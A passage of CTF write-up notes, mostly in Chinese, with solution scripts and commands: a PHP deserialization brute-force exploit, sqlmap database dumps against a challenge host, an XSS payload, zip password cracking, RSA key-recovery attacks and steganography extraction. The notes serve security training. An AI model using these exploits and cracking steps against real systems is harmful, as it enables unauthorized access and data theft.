import string
from urllib.parse import quote
pwd = string.ascii_lowercase + string.digits
S = 'abcdefghijklmnopqrstuvwxyz0123456789.'
url = "http://127.0.0.1:7777/task.php"
payload = '?p=O:4:"Read":1:{{s:4:"text";O:6:"Secret":1:{{s:8:"filename";s:{}:"{}";}}}}'
url += payload
if __name__ == "__main__":
flag = 'glob://flag_'
while len(flag)&lt;40:
for i in S:
tmp = flag + i + '*'
r = requests.get(url.format(len(tmp), tmp))
if 'flag_' not in r.text[-50:]:
flag += i
break
print(flag)
</code></pre>
<p>exp.rs</p>
<pre><pre class="playground"><code class="language-rust"><span class="boring">#![allow(unused)]
</span><span class="boring">fn main() {
</span>use crate::http;
pub fn just_serialize(){
let alphabet = "abcdefghijklmnopqrstuvwxyz0123456789.";
let url = "http://127.0.0.1:7777/task.php";
let mut flag = "glob://flag_".to_string();
while flag.len() &lt; 50 {
for i in alphabet.chars(){
let temp = format!("{}{}*",flag,i);
let url = format!("{}?p=O:4:\"Read\":1:{{s:4:\"text\";O:6:\"Secret\":1:{{s:8:\"filename\";s:{}:\"{}\";}}}}",url,temp.len(),temp);
let r = http::get(&amp;url).expect("");
if !r.1.ends_with("flag_") {
flag.push(i);
break;
}
}
println!("{}",flag);
}
}
<span class="boring">}</span></code></pre></pre>
<h2 id="流量分析实战"><a class="header" href="#流量分析实战">流量分析实战</a></h2>
<p>filter http 发现 有两个可疑文件
<img src="../../img_list/image20230608170605207.png" alt="image-20230608170605207" />
<img src="../../img_list/image20230608170545618.png" alt="image-20230608170545618" />
导出这两个php
<img src="../../img_list/image20230608171015744.png" alt="image-20230608171015744" />
<img src="../../img_list/image20230608171049710.png" alt="image-20230608171049710" /></p>
<h1 id=""><a class="header" href="#"><img src="../../img_list/image20230608171116488.png" alt="image-20230608171116488" /></a></h1>
<p>复制粘贴到01editor 保存为demo.zip
<img src="../../img_list/image20230609122944950.png" alt="image-20230609122944950" />
破解得到密码为hackerme8888 解压得到flag.txt
flag{2c094ea0-088c-440e-b6da-472e1bec6239}</p>
<h2 id="spiral-螺旋矩阵"><a class="header" href="#spiral-螺旋矩阵">spiral 螺旋矩阵</a></h2>
<p>已知图片spiral.png
<img src="../../img_list/spiral.png" alt="spiral" />
<img src="../../img_list/image20230609154832720.png" alt="image-20230609154832720" />
解密base64得到
flag{fake_flag} But RGBA色彩空间缺一不可哦~ 我教你还原:aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0dXX3dnL2FydGljbGUvZGV0YWlscy8xMjA0MDYxOTI=</p>
<pre><code>echo aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L0dXX3dnL2FydGljbGUvZGV0YWlscy8xMjA0MDYxOTI= | base64 -d
</code></pre>
<p>https://blog.csdn.net/GW_wg/article/details/120406192
根据图片得到了图片加密的代码task.py</p>
<pre><code class="language-python">def function(n):
matrix = [[0] * n for _ in range(n)]
number = 1
left, right, up, down = 0, n - 1, 0, n - 1
while left &lt; right and up &lt; down:
# 从左到右
for i in range(left, right):
matrix[up][i] = number
number += 1
# 从上到下
for i in range(up, down):
matrix[i][right] = number
number += 1
# 从右向左
for i in range(right, left, -1):
matrix[down][i] = number
number += 1
for i in range(down, up, -1):
matrix[i][left] = number
number += 1
left += 1
right -= 1
up += 1
down -= 1
# n 为奇数的时候,正方形中间会有个单独的空格需要单独填充
if n % 2 != 0:
matrix[n // 2][n // 2] = number
return matrix
</code></pre>
<p>写出下面的代码exp.py</p>
<pre><code class="language-python">from PIL import Image
def spiral_order(matrix):
if not matrix:
return []
result = []
while matrix:
result.extend(matrix.pop(0))
if matrix and matrix[0]:
for row in matrix:
result.append(row.pop())
if matrix:
result.extend(matrix.pop()[::-1])
if matrix and matrix[0]:
for row in matrix[::-1]:
result.append(row.pop(0))
return result
def reconstruct_image(image_path):
# 打开图片
image = Image.open(image_path)
# 转换为RGBA模式
image_rgba = image.convert("RGBA")
# 获取图片像素数据
pixel_data = list(image_rgba.getdata())
# 获取图片宽度和高度
width, height = image.size
# 将像素数据重新排列为二维矩阵
matrix = [pixel_data[i * width:(i + 1) * width] for i in range(height)]
# 获取螺旋矩阵还原后的像素顺序
spiral_order_pixels = spiral_order(matrix)
# 创建新的图片对象
new_image = Image.new("RGBA", (width, height))
new_image.putdata(spiral_order_pixels)
# 显示图片
new_image.show()
# new_image.sage("new.png")
# 示例用法
reconstruct_image("spiral.png")
</code></pre>
<p>把代码形成的new.png 用stegsolve打开
<img src="../../img_list/image20230609155622535.png" alt="image-20230609155622535" />
在alpha通道得到了密码mUv8vvGRMNK5mgbxPNsH
用密码解压得到flag
<img src="../../img_list/image20230609160056361.png" alt="image-20230609160056361" /></p>
<h1 id="ichunqiuctf"><a class="header" href="#ichunqiuctf">IchunqiuCTF</a></h1>
<h2 id="quoted-printable"><a class="header" href="#quoted-printable">Quoted-printable</a></h2>
<pre><code>1.unzip file and open .txt copy text code
2.use quoted_printable_cli -d text to decode
flag{那你也很棒哦}
</code></pre>
<h2 id="zero_one"><a class="header" href="#zero_one">zero_one</a></h2>
<pre><code>ctf-party "01001100011010010011000" from_bin
</code></pre>
<h2 id="rsa"><a class="header" href="#rsa">RSA</a></h2>
<pre><code>1.use rsa.py get d
</code></pre>
<h3 id="wieners-rsa-attack"><a class="header" href="#wieners-rsa-attack">Wieners RSA Attack</a></h3>
<pre><code class="language-python">import gmpy2
import libnum
def continuedFra(x, y):
"""计算连分数
:param x: 分子
:param y: 分母
:return: 连分数列表
"""
cf = []
while y:
cf.append(x // y)
x, y = y, x % y
return cf
def gradualFra(cf):
"""计算传入列表最后的渐进分数
:param cf: 连分数列表
:return: 该列表最后的渐近分数
"""
numerator = 0
denominator = 1
for x in cf[::-1]:
# 这里的渐进分数分子分母要分开
numerator, denominator = denominator, x * denominator + numerator
return numerator, denominator
def solve_pq(a, b, c):
"""使用韦达定理解出pqx^2(p+q)x+pq=0
:param a:x^2的系数
:param b:x的系数
:param c:pq
:return:pq
"""
par = gmpy2.isqrt(b * b - 4 * a * c)
return (-b + par) // (2 * a), (-b - par) // (2 * a)
def getGradualFra(cf):
"""计算列表所有的渐近分数
:param cf: 连分数列表
:return: 该列表所有的渐近分数
"""
gf = []
for i in range(1, len(cf) + 1):
gf.append(gradualFra(cf[:i]))
return gf
def wienerAttack(e, n):
"""
:param e:
:param n:
:return: 私钥d
"""
cf = continuedFra(e, n)
gf = getGradualFra(cf)
for d, k in gf:
if k == 0: continue
if (e * d - 1) % k != 0:
continue
phi = (e * d - 1) // k
p, q = solve_pq(1, n - phi + 1, n)
if p * q == n:
return d
n= 68781015120012754009149819243839432182753699533745468739333557116438115901358573880902197723852823949505376140916570536753019491036629572363854637530919546688901226752085109196549145599781909847664046508960094447692268230516763088293911965638780888720788954194778424857089535187609738198309161969913567107861
e= 54093680529782962282616750547542407544796590039913570980901028264103594185617926725669901283009540557359666956131385125727959502505561517117179644650419753631214251337533961664493198676862110639584202010794500844074619335752668896589407110076134931918634061631574656816488381501901503924226166074238518619869
c= 30443384983816710270001651296607959522389400057103143909277631290995899073895621701281106228069835965181342091582584186637031613250922961166298411359757600825556083868477673357860585539016515776933117915504873987178857740106223631465737111746470236003857656528610755145017342412306680097140732745012583119076
d=wienerAttack(e, n)
m=pow(c, d, n)
print(libnum.n2s(m).decode())
</code></pre>
<h2 id="windows系统密码"><a class="header" href="#windows系统密码">Windows系统密码</a></h2>
<pre><code>1. open https://www.bejson.com/enc/md5dsc/ decode MD5
2.can get good-luck
</code></pre>
<h2 id="二维码"><a class="header" href="#二维码">二维码</a></h2>
<pre><code>1. cat qr_code.png 发现了4number.txt还有一些PK值敏感想到可能隐藏了一个zip压缩包(zip的创始人名字简写为PK)和4number.txt文件
2. binwalk qr_code.png 结果如下,检测出图片中存在压缩包
3. foremost qr_code.png 分离压缩包 进入output 文件夹 有加密的 00000000.zip
4. fcrackzip -b -c 1 -l 4-4 -u 00000000.zip 找到密码为7639 打开.txt 有flag
flag{vjpw_wnoei}
1. hexdump -C qr_code.png
2. binwalk -e qr_code.png 分离压缩包
3. cd qr_code.png.extrackted
4. zip2john 1d7.zip &gt;&gt; hash
5. john hash --show
flag{vjpw_wnoei}
</code></pre>
<pre><code># 隐藏
# hidden.txt是要隐藏的文件, demo.jpg是用来隐藏信息的图片, out.jpg是有隐藏信息的图片
outguess -k "my secret key" -d hidden.txt demo.jpg out.jpg
# 提取
outguess -k "my secret key" -r out.jpg hidden.txt
# 隐藏数据 To embed emb.txt in cvr.jpg
steghide embed -cf cvr.jpg -ef emb.txt
# 提取数据 To extract embedded data from stg.jpg
steghide extract -sf stg.jpg
</code></pre>
<h2 id="stxxhxxx"><a class="header" href="#stxxhxxx">stxxhxxx</a></h2>
<pre><code>flag:ctf{welcom_to_upc_im}
1. steghide extract -sf stxxhxxx.jpeg
2. cat info
</code></pre>
<h2 id="rar"><a class="header" href="#rar">rar</a></h2>
<pre><code>use rust buuctf::solutions::fcreack_rar().await; to force crack password
</code></pre>
<h2 id="dangerous-rsa"><a class="header" href="#dangerous-rsa">Dangerous RSA</a></h2>
<pre><code class="language-python">def Dangerous_RSA():
e = 0x3
n = 0x52d483c27cd806550fbe0e37a61af2e7cf5e0efb723dfc81174c918a27627779b21fa3c851e9e94188eaee3d5cd6f752406a43fbecb53e80836ff1e185d3ccd7782ea846c2e91a7b0808986666e0bdadbfb7bdd65670a589a4d2478e9adcafe97c6ee23614bcb2ecc23580f4d2e3cc1ecfec25c50da4bc754dde6c8bfd8d1fc16956c74d8e9196046a01dc9f3024e11461c294f29d7421140732fedacac97b8fe50999117d27943c953f18c4ff4f8c258d839764078d4b6ef6e8591e0ff5563b31a39e6374d0d41c8c46921c25e5904a817ef8e39e5c9b71225a83269693e0b7e3218fc5e5a1e8412ba16e588b3d6ac536dce39fcdfce81eec79979ea6872793
c = 0x10652cdfaa6b63f6d7bd1109da08181e500e5643f5b240a9024bfa84d5f2cac9310562978347bb232d63e7289283871efab83d84ff5a7b64a94a79d34cfbd4ef121723ba1f663e514f83f6f01492b4e13e1bb4296d96ea5a353d3bf2edd2f449c03c4a3e995237985a596908adc741f32365
k = 0
while 1:
res = iroot(c+k*n,e) #c+k*n 开3次方根 能开3次方即可
#print(res)
#res = (mpz(13040004482819713819817340524563023159919305047824600478799740488797710355579494486728991357), True)
if(res[1] == True):
print(libnum.n2s(int(res[0]))) #转为字符串
break
k=k+1
Dangerous_RSA()
</code></pre>
<h2 id="rsa-flagenc-pubkey"><a class="header" href="#rsa-flagenc-pubkey">RSA flag.enc pub.key</a></h2>
<pre><code class="language-bash">1. openssl rsa -pubin -in pub.key -text -modulus
2. convert to decimal n = int("C0332C5C64AE47182F6C1C876D42336910545A58F7EEFEFC0BCAAF5AF341CCDD",16)
3. factordb 86934482296048119190666062003494800588905656017203025617216654058378322103517
4. p = 285960468890451637935629440372639283459
5. q = 304008741604601924494328155975272418463
6. e = 65537
import gmpy2
import rsa
n = int("C0332C5C64AE47182F6C1C876D42336910545A58F7EEFEFC0BCAAF5AF341CCDD",16)
p = 285960468890451637935629440372639283459
q = 304008741604601924494328155975272418463
e = 65537
phin = (q-1)*(p-1)
d = gmpy2.invert(e, phin)
key = rsa.PrivateKey(n, e, int(d), p, q)
with open("./flag.enc", "rb+") as f:
f = f.read()
print(rsa.decrypt(f, key))
flag{decrypt_256}
</code></pre>
<h2 id="这个压缩包有点麻烦"><a class="header" href="#这个压缩包有点麻烦">这个压缩包有点麻烦</a></h2>
<pre><code class="language-sh">fcrackzip -b -c 1 -l 6-6 -u attachment.zip =&gt;483279
open windows crack by password-note.txt and 解压flag.zip
bkcrack -C flag.zip -c README.txt -p README.txt
bkcrack -C flag.zip -c flag.jpg -k 060fd5e1 d1f696b7 12655d8d -d flag =&gt;生产flag图片
binwalk flag =&gt;发现有zip
binwalk -e flag =&gt;提出4FC5.zip
imhex 4FC5.zip =&gt;用imhex清除伪密码 14 00 09 改为14 00 00
unzip 4FC5.zip =&gt;可以看到flag
</code></pre>
<h2 id="lsbhacking"><a class="header" href="#lsbhacking">lsbHacking</a></h2>
<pre><code class="language-sh">#solution1
java -jar Stegsolve.jar
open image
data analis
select 0
and save bin flag.png
open CaptfEncoder-ubuntu-20-x64-3.1.2.bin
decode qrcode
#solution2
zsteg flag11.png
zsteg flag11.png -E b1,rgb,lsb,xy &gt; flag1.png
open CaptfEncoder-ubuntu-20-x64-3.1.2.bin
decode qrcode
</code></pre>
<h2 id="眼见非实"><a class="header" href="#眼见非实">眼见非实</a></h2>
<pre><code class="language-sh">mv zip z.zip
unzip z.zip
binwalk -e 眼见非实.docx
mv 眼见非实.docx yan.zip
unzip yan.zip
open extreated folder with code search flag
</code></pre>
<h2 id="t0p_gear"><a class="header" href="#t0p_gear">T0p_Gear</a></h2>
<pre><code class="language-sh">https://www.cnblogs.com/ms-study/p/13201030.html
</code></pre>
<p>#@ add user for archlinux WSL and login</p>
<pre><code class="language-sh">wsl.exe -d Arch login
user_name:andrew
password:dnr..
# open /etc/sudoers add that
nano /etc/sudoers
andrew ALL=(ALL) ALL
</code></pre>
<h2 id="use-steghide"><a class="header" href="#use-steghide">use steghide</a></h2>
<pre><code>#显示信息
steghide info demo.png
zsteg -a demo.png
</code></pre>
<h2 id="这是类"><a class="header" href="#这是类">这是类</a></h2>
<pre><code class="language-python"># strings AppletMain.class
s = "\u0066\u006c\u0061\u0067\u007b\u0033\u0034\u0038\u0034\u0066\u0038\u0033\u0061\u002d\u0066\u0062\u0035\u0033\u002d\u0034\u0062\u0038\u0031\u002d\u0061\u0033\u0061\u0037\u002d\u0064\u0038\u0062\u0064\u0031\u0039\u0032\u0036\u0036\u0062\u0062\u0033\u007d"
decoded_s = bytes(s, "utf-8").decode("unicode_escape")
print(decoded_s)
# flag{3484f83a-fb53-4b81-a3a7-d8bd19266bb3}
</code></pre>
<h2 id="我藏起来了"><a class="header" href="#我藏起来了">我藏起来了</a></h2>
<pre><code class="language-bash">css_remove_display_none
zsteg im.png
flag{72a8c48e-5bb0-40ef-b3f0-5543c3b16dfd}
</code></pre>
<h2 id="gif提取隐藏信息"><a class="header" href="#gif提取隐藏信息">gif提取隐藏信息</a></h2>
<pre><code class="language-sh">convert new_gif.gif -coalesce xx_%05d.png
一个一个看形成的图片能够得到flag
</code></pre>
<h2 id="棋盘密码上古神器"><a class="header" href="#棋盘密码上古神器">棋盘密码,上古神器</a></h2>
<pre><code class="language-bash">“波利比奥斯棋盘”
“3534315412244543_434145114215_132435231542”
</code></pre>
<p>https://www.qqxiuzi.cn/bianma/qipanmima.php</p>
<h2 id="flow_analysis"><a class="header" href="#flow_analysis">flow_analysis</a></h2>
<pre><code class="language-sh">#convert pcapng to pcap
tshark -F pcap -r ctf.pcapng -w newfile.pcap
</code></pre>
<p>getsqlinjection.py</p>
<pre><code class="language-python">import urllib
import pyshark
cap_file = '/run/media/andrew/HIKVISION/CTF/ichunqiu_ctf/flow_analysis/ctf.pcapng'
cap = pyshark.FileCapture(cap_file, display_filter='http &amp;&amp; ip.addr == 192.168.61.140 &amp;&amp; ip.addr == 192.168.61.1')
is_http_request = 'is_http_request'
http_request = []
blind_attack_success = []
for i in range(len([_ for _ in cap])):
check = getattr(cap[i].http, 'time', is_http_request)
if check != is_http_request:
if float(cap[i].http.time) &gt; 3:
for j in range(i, 0, -1):
if cap[j].frame_info.number == cap[i].http.request_in:
http_request.append((cap[j].frame_info.number, cap[j]))
http_request.append((cap[i].frame_info.number, cap[i]))
blind_attack_success.append(urllib.parse.unquote(cap[j].http.file_data))
print(cap[j].frame_info.number)
print(cap[j])
print(urllib.parse.unquote(cap[j].http.file_data))
# input()
print("----")
print(cap[i].frame_info.number)
print(cap[i])
print("----"*3)
break
with open('output.txt', 'w') as f:
f.writelines('\n'.join(blind_attack_success))
</code></pre>
<p>getasciicode.py</p>
<pre><code>file_path = 'output.txt'
with open(file_path, 'r') as f:
lines = f.readlines()
ascii_digits = [ _.split('=')[2].split(',')[0] for _ in lines]
ascii_letters = ''.join([chr(int(_)) for _ in ascii_digits])
print(ascii_letters)
</code></pre>
<h2 id="new-swan-stone-castle"><a class="header" href="#new-swan-stone-castle">New Swan Stone Castle</a></h2>
<pre><code class="language-bash">sqlmap -u "http://eci-2zea7vhhynj4nfjrq8ni.cloudeci1.ichunqiu.com/index.php?id=1" --prefix "%22%29" suffix "%23"
sqlmap -u "http://eci-2zea7vhhynj4nfjrq8ni.cloudeci1.ichunqiu.com/index.php?id=1" --prefix "%22%29" suffix "%23" --current-db
sqlmap -u "http://eci-2zea7vhhynj4nfjrq8ni.cloudeci1.ichunqiu.com/index.php?id=1" --prefix "%22%29" suffix "%23" -D sql100510013 --tables
sqlmap -u "http://eci-2zea7vhhynj4nfjrq8ni.cloudeci1.ichunqiu.com/index.php?id=1" --prefix "%22%29" suffix "%23" -D sql100510013 -T password --columns
sqlmap -u "http://eci-2zea7vhhynj4nfjrq8ni.cloudeci1.ichunqiu.com/index.php?id=1" --prefix "%22%29" suffix "%23" -D sql100510013 -T password -C id --dump
sqlmap -u "http://eci-2zea7vhhynj4nfjrq8ni.cloudeci1.ichunqiu.com/index.php?id=1" --prefix "%22%29" suffix "%23" -D sql100510013 -T password -C pwd --dump
</code></pre>
<h2 id="万国码"><a class="header" href="#万国码">万国码</a></h2>
<pre><code class="language-bash">file:///usr/share/webapps/cyberchef/index.html#recipe=Unescape_Unicode_Characters('%5C%5Cu')
decode unicode "\u0049\u0063\u0068\u0075\u006e\u0071\u0069\u0075\u007a\u006e\u007a\u006c"
enter value get flag
</code></pre>
<h2 id="考考小李"><a class="header" href="#考考小李">考考小李</a></h2>
<pre><code class="language-bash">'&gt;&lt;script&gt;alert(xx)&lt;/script&gt;
把上面的提交能够得到flag
flag{608837f4-bbc5-464c-99ab-7b44016d1ee9}
</code></pre>
<h2 id="回旋13踢"><a class="header" href="#回旋13踢">回旋13踢</a></h2>
<pre><code class="language-bash">xw4n73qm23z rot13
enter value get flag
</code></pre>
<h2 id="隐藏的编码"><a class="header" href="#隐藏的编码">隐藏的编码</a></h2>
<pre><code class="language-bash">adslkjadsl a ,zmxnc,zmc,zxcopaweqwk;l;l;l;l;l;l;l;l;l;l;l;ldkm,ZGY1czRh==.zxmczxkchzxkhiqewupipsad;l;l;l;l;l;l;l;l;l;l;l;l
base64 -d ZGY1czRh==
enter value get flag
</code></pre>
<h2 id="致敬经典"><a class="header" href="#致敬经典">致敬经典</a></h2>
<pre><pre class="playground"><code class="language-rust"><span class="boring">#![allow(unused)]
</span><span class="boring">fn main() {
</span>//看图片应该是凯撒加密 分析秘钥发现有偏移6ASCII code 为偶数时右偏移6奇数时左偏移6
fn caesar_cipher_decode_uniqe(text: &amp;str, shift: u32) -&gt; String {
println!("{}",text);
let mut result = String::new();
for c in text.chars() {
match c {
'a'..='z' =&gt; {
let mut ascii_code = c as u8;
if ascii_code %2 !=0{
ascii_code+=6;
}else{
ascii_code-=6;
}
if ascii_code&gt;'z' as u8{
ascii_code = ascii_code - ('z' as u8)+('a' as u8)-1;
}
result.push((ascii_code) as char);
}
'A'..='Z' =&gt; {
let mut ascii_code = c as u8;
if ascii_code %2 !=0{
ascii_code+=6;
}else{
ascii_code-=6;
}
if ascii_code&gt;'Z' as u8{
ascii_code = ascii_code - ('Z' as u8)+('A' as u8)-1;
}
result.push((ascii_code) as char);
}
_ =&gt; result.push(c),
}
}
println!("{}",result);
result
}
caesar_cipher_decode_uniqe("lrua{1uy3yj9l-yw9u-48j2-uuj8-36h03706y7u7}",6);
<span class="boring">}</span></code></pre></pre>
<h2 id="xor-签到题"><a class="header" href="#xor-签到题">xor 签到题</a></h2>
<pre><pre class="playground"><code class="language-rust">fn main() {
let file = include_bytes!("xor GAME.txt").to_vec();
let key = "GAME".as_bytes().iter().map(|s|s.to_owned()).collect::&lt;Vec&lt;u8&gt;&gt;();
let new_file = xor(file,key);
println!("{}",String::from_utf8_lossy(&amp;new_file));
}
fn xor(vec:Vec&lt;u8&gt;,key:Vec&lt;u8&gt;)-&gt;Vec&lt;u8&gt;{
let mut new_file = vec![];
for f in 0..vec.len(){
let ff= vec.get(f).unwrap()^key.get(f%key.len()).unwrap();
new_file.push(ff);
}
new_file
}</code></pre></pre>
<pre><code class="language-python">with open("xor GAME.txt","r") as f:
bytes = f.read()
game = "GAME"
flag = []
for i in range(len(bytes)):
new_b = ord(str(bytes[i]).encode('utf-8')) ^ ord(game[i%len(game)].encode('utf-8'))
flag.append(chr(new_b))
print("".join(flag))
</code></pre>
<h2 id="crymisc"><a class="header" href="#crymisc">CryMisc</a></h2>
<pre><code class="language-python">import pyminizip
pyminizip.compress(r"jiami.py","",r"jiami.zip","",0)
#用AZPR明文破解
AESencrypt.py 可以得到
n = int("48D6B5DAB6617F21B39AB2F7B14969A7337247CABB417B900AE1D986DB47D971",16)=32945885482421841602167475970472000545315534895409154025267147105384142461297
factordb 32945885482421841602167475970472000545315534895409154025267147105384142461297
import gmpy2
import rsa
n = 32945885482421841602167475970472000545315534895409154025267147105384142461297
p = 177334994338425644535647498913444186659
q = 185783328357334813222812664416930395483
e = 65537
phin = (q-1)*(p-1)
d = gmpy2.invert(e, phin)
key = rsa.PrivateKey(n, e, int(d), p, q)
with open("./message.encrypted", "rb+") as f:
f = f.read()
print(rsa.decrypt(f, key))
</code></pre>
<h2 id="pintu"><a class="header" href="#pintu">PINTU</a></h2>
<pre><code class="language-python">from PIL import Image
import os
# create a new image size of 4000x2000 pixels and black background
pic = Image.new('RGB',(4000,2000),(0,0,0))
# list all image files
img_list = os.listdir('./img')
for i in range(len(img_list)):
print("./img/{}".format(img_list[i]))
# read image and reads the width and height of the image from the file header
f = open(f'./img/{img_list[i]}','rb').read()
w,h = f[6],f[8]
img = Image.open(f'./img/{img_list[i]}')
# create image with 32 columns and 18 rows
pic.paste(img,(32*w,18*h))
pic.save("all_image.png")
</code></pre>
<h2 id="tiger"><a class="header" href="#tiger">tiger</a></h2>
<pre><code class="language-sh">cat png-key.txt | rot47 decode
conda activate py27
python lsb.py extract key.png-stego.png gen.txt 28a217fe
cat gen.txt
unzip -Z flag_1.zip
bkcrack -C flag_1.zip -c information.txt.txt -p information.txt.txt
bkcrack -C flag_1.zip -c flag -k 968eae79 e129f7a6 43893e7a -d flag
qrcli decode flag.png &gt; zero.txt
https://yuanfux.github.io/zero-width-web/ decode content
Owl wvn n xhkm SBWav krttqbu gfq gja jhheu up yljycxjpu, vvtx R jzeh pydv usd zp lalhmk, ic brtkac ya whep{866q3755-t358-5119-txnr-juw666e8099m}, uroa okv!
https://www.guballa.de/vigenere-solver decode vigenere
flag{866d3755-c358-5119-abeb-bda666a8099d}
</code></pre>
<h2 id="外太空的秘密"><a class="header" href="#外太空的秘密">外太空的秘密</a></h2>
<pre><code class="language-python">print("q1:{}".format(pow(9,9)))
s=['A','C','G','T','R','N','D','E','G']
cnt=0
for i in range(9):
for j in range(9):
for k in range(9):
for m in range(9):
for n in range(9):
for o in range(9):
for p in range(9):
for q in range(9):
for r in range(9):
_str=s[i]+s[j]+s[k]+s[m]+s[n]+s[o]+s[p]+s[q]+s[r]
cnt+=1
if _str=='AAAARNDEG':
print("q2:{}".format(cnt))
if cnt==1001:
print("q3:{}".format(_str))
</code></pre>
<h2 id="rsa256"><a class="header" href="#rsa256">rsa256</a></h2>
<pre><code class="language-python">openssl rsa -pubin -in public.key -text -modulus
e = 65537
int("00c284826149197696792dc7fd3399fc012a98fc54e227ba30350125ac815dc705",16)
factordb 87982816287542607821348020319142008042005562918106976160430773236821410039557
p=274473488606178722897600533120866465659 q=320551236967671239609994506214257226623
import gmpy2
import rsa
n = int("00c284826149197696792dc7fd3399fc012a98fc54e227ba30350125ac815dc705",16)
p = 274473488606178722897600533120866465659
q = 320551236967671239609994506214257226623
e = 65537
phin = (q-1)*(p-1)
d = gmpy2.invert(e, phin)
key = rsa.PrivateKey(n, e, int(d), p, q)
with open("./message.encrypted", "rb+") as f:
f = f.read()
print(rsa.decrypt(f, key))
</code></pre>
<h2 id="ziji"><a class="header" href="#ziji">ziji</a></h2>
<pre><code class="language-bash"># python2 decomress_zlib.py
# file:///usr/share/webapps/cyberchef/index.html#recipe=From_Hex('None')
# get 1111111000100001101...
# 用01画图1的话(0,0,0),0的话(255,255,255)
</code></pre>
<pre><code class="language-python"># decomress_zlib.py
# 解压zlib
import zlib
import binascii
idat ="789C5D91011280400802BF04FFFF5C75294B5537738A21A27D1E49CFD17DB3937A92E7E603880A6D485100901FB0410153350DE83112EA2D51C54CE2E585B15A2FC78E8872F51C6FC1881882F93D372DEF78E665B0C36C529622A0A45588138833A170A2071DDCD18219DB8C0D465D8B6989719645ED9C11C36AE3ABDAEFCFC0ACF023E77C17C7897667".decode("hex")
result = binascii.hexlify(zlib.decompress(idat))
print(result)
</code></pre>
<pre><code class="language-python"># draw_img.py
# 像素画图
from PIL import Image
import os
import math
# 用01画图1的话(0,0,0),0的话(255,255,255)
bins = "1111111000100001101111111100000101110010110100000110111010100000000010111011011101001000000001011101101110101110110100101110110000010101011011010000011111111010101010101111111000000001011101110000000011010011000001010011101101111010101001000011100000000000101000000001001001101000100111001111011100111100001110111110001100101000110011100001010100011010001111010110000010100010110000011011101100100001110011100100001011111110100000000110101001000111101111111011100001101011011100000100001100110001111010111010001101001111100001011101011000111010011100101110100100111011011000110000010110001101000110001111111011010110111011011"
size = int(math.sqrt(len(bins)))
# create a new image size of size*size pixels and black background
pic = Image.new('RGB',(100,100),(0,0,0))
index = 0
for i in range(size):
for j in range(size):
if bins[index]=="0":
pic.putpixel([j,i],(255,255,255))
index+=1
pic.save("all_image.png")
</code></pre>
<h2 id="xor很心疼你"><a class="header" href="#xor很心疼你">Xor很心疼你</a></h2>
<pre><code class="language-python">#***Task
# Python3
from secret import flag
import random
import base64
pool = 'qwertyuiopasdfghjklzxcvbnm1234567890QWERTYUIOPASDFGHJKLZXCVBNM'
r = random.randint(2, 250)
assert flag.startswith('hsctf{')
def generate(length):
return ''.join(random.choices(pool, k=length))
def f(x):
random.seed(x)
return random.getrandbits(8)
def encrypt(plaintext, key):
plaintext = list(map(ord, plaintext))
for _ in range(20):
key = f(key)
assert key != 0
for i in range(len(plaintext)):
key = f(key)
tmp = (key * r) % 251
assert tmp != 0 and key != 0
plaintext[i] = plaintext[i] ^ tmp
plaintext = bytes(plaintext)
return base64.b64encode(plaintext)
m = generate(random.randint(200, 300)) + flag + generate(random.randint(200, 300))
c = encrypt(m, random.getrandbits(128))
print(c)
# b'8OcTbAfL6/kOMQnC9v8SNmmSzvQMeGTT8vANM1T+7vIce2fo0fc2RnScrNxTSmeSyuMjMF//w8BWaXX91dsGcnvmreg0NQTw96ceVVXj3sQ3Znn51OU1S0bOyaMtNHTj36AcWFqewN4zRUXD6agGbAPE+tQtd3XG0doAa1Ll9fhcQ1zk0McTM1bv8PIQOAnn3vQ3UgLD3PsONXLs4KkXMnjTyMEQOFn/0uYVUwOY1PsleEHCyNopRVDr+Kc0e2PH9v0XNXfprfIPU3nw7KYTNX/G7twLSkHoyaUlQHXi3v02UHmdy/4iNgme3Pc8bgPp+tYWV1+YzPkXYkXM4ulUc27DrM4SNUPT2fQlckj1qP4Fal+YoPYJMlyZ8qhXfF3Y0tUDdUXl3vg0dFTi++VVOFfH/dgMS1ru9N8WU0HF9cUCTgPe+qVdSn/u7Mkda0GTw/QDcWPZ9KYGN2jSzfk0OVrMzt0yRHD64KMrUgPF2sFWcmP56KZSTAD61PUGeXrd49MgU1bL8OsVNWj91vIsalXwqf0qaWbwzv0lWETA4eElS3L99cYmU1nv9dRQTWbDyclScQTN6NIhV2j//+ZWbH7Z68kwM3Dy4dcUc1PQy8kRTl/4zcU9WGWfoakOMXuf69MXZQTEz+kJT1Dar8UN'
#***Solution
# Python3
import random
import base64
cc=b'8OcTbAfL6/kOMQnC9v8SNmmSzvQMeGTT8vANM1T+7vIce2fo0fc2RnScrNxTSmeSyuMjMF//w8BWaXX91dsGcnvmreg0NQTw96ceVVXj3sQ3Znn51OU1S0bOyaMtNHTj36AcWFqewN4zRUXD6agGbAPE+tQtd3XG0doAa1Ll9fhcQ1zk0McTM1bv8PIQOAnn3vQ3UgLD3PsONXLs4KkXMnjTyMEQOFn/0uYVUwOY1PsleEHCyNopRVDr+Kc0e2PH9v0XNXfprfIPU3nw7KYTNX/G7twLSkHoyaUlQHXi3v02UHmdy/4iNgme3Pc8bgPp+tYWV1+YzPkXYkXM4ulUc27DrM4SNUPT2fQlckj1qP4Fal+YoPYJMlyZ8qhXfF3Y0tUDdUXl3vg0dFTi++VVOFfH/dgMS1ru9N8WU0HF9cUCTgPe+qVdSn/u7Mkda0GTw/QDcWPZ9KYGN2jSzfk0OVrMzt0yRHD64KMrUgPF2sFWcmP56KZSTAD61PUGeXrd49MgU1bL8OsVNWj91vIsalXwqf0qaWbwzv0lWETA4eElS3L99cYmU1nv9dRQTWbDyclScQTN6NIhV2j//+ZWbH7Z68kwM3Dy4dcUc1PQy8kRTl/4zcU9WGWfoakOMXuf69MXZQTEz+kJT1Dar8UN'
cc=base64.b64decode(cc)
flag = 'hsctf{'
pool = 'qwertyuiopasdfghjklzxcvbnm1234567890QWERTYUIOPASDFGHJKLZXCVBNM'
assert flag.startswith('hsctf{')
def generate(length):
return ''.join(random.choices(pool, k=length))
def f(x):
random.seed(x)
return random.getrandbits(8)
def encrypt(plaintext, key):
plaintext = list(map(ord, plaintext))
for i in range(len(plaintext)):
key = f(key)
tmp = (key * r) % 251
#assert tmp != 0 and key != 0
plaintext[i] = plaintext[i] ^ tmp
plaintext = bytes(plaintext)
return plaintext
def decrypt(ciphertext, key):
ciphertext=list(ciphertext)
for i in range(len(ciphertext)):
key = f(key)
tmp = (key * r) % 251
